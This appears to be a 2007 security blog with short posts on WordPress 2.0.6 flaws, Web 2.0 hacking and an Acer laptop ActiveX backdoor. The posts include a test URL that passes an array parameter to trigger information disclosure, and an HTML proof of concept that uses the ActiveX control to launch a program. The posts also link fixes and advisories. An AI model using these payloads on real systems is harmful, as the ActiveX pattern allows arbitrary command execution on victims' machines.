Comments(1)
A serious security vulnerability has been found in WordPress <=2.0.6. This can’t be good for them as they just released 2.0.6 “11 days ago”.
http://milw0rm.com/exploits/3109
Comments(2)
xy7 found an information disclosure vulnerability in WordPress <= 2.0.6.
It looks like this vulnerability is limited to information leakage only. If you want to test your WP installation see below.
http://my_wordpress/index.php?m[]=
OR
http://my_wordpress/?m[]=
Note: Always make backups before making any changes.
As a temporary fix we ensure that the input being passed to the rawurlencode function is a string and not an array which is what is causing the problems.
If I hear of WordPress releasing an official patch I will update this post.
Comments(0)
Is it just me or is it cold in the security room? Has anyone noticed that the security community is having a hard time letting go of “traditional” vulnerabilities and welcoming the new? I am not saying that *Overflows, Format String vuls etc are finished, in fact I think they will be around for some time. What I am saying is that Web 2.0 is the “new order” on the net. Rich Internet Applications (applications that support the same features as a desktop application) are becoming more and more popular (i.e. Adobe’s Flex 2 RIA framework) and the web is growing with a plethora of development possibilities.
What does this mean? It means a revamp and upgrade of “traditional” hacking terminology. For example, the term “Backdooring” traditionally means: “… a method of bypassing normal authentication or obtaining remote access to a computer, while intended to remain hidden to casual inspection. The backdoor may take the form of an installed program (e.g., Back Orifice) or could be a modification to a legitimate program.” - WIKIPedia:Backdoor
So we embed malicious code into a Flash, PDF, DOM, HTML, Quicktime etc. Can this code be used to “bypass normal authentication?”, absolutely, can it be “hidden from casual inspection”, certainly.
I think last year we saw alot of exploitation of the “low-hanging” fruit. Why is this possible in the first place? because no one has cared until now. We have made a good start but I fear we only scratching the surface when it comes to Web 2.0 Hacking.
Comments(2)
Update: 17/01 - Solution section
I just read an article on Slashdot that really made be stare!
Pop question hot shot, what do you think this is:
<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3A A" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>
This is proof of concept code (thanks to Koyaanisqatsi). It exploits Acer laptops which have apparently been backdoored with an ActiveX control since 1998.
I wonder how many other hardware and software vendors provide such feature-rich facilities.
So if you have an Acer laptop install Linux. If you want to stick with Windows use Firefox because IE (Internet Explorer) is going to get you owned.
A Fix has been provided:
http://www.kb.cert.org/vuls/id/221700
Comments(0)
Well if you haven’t upgraded to WordPress 2.0.6 we would recommend you do it now!
There were two critical vulnerabilities found in WordPress <= 2.0.5:
Credits to Stefan Esser [sesser@hardened-php.net]. He seems to have released an advisory for the CSRF and written a POC exploit for the SQL Injection hole. I assume the CSRF hole is the same one that we found last month.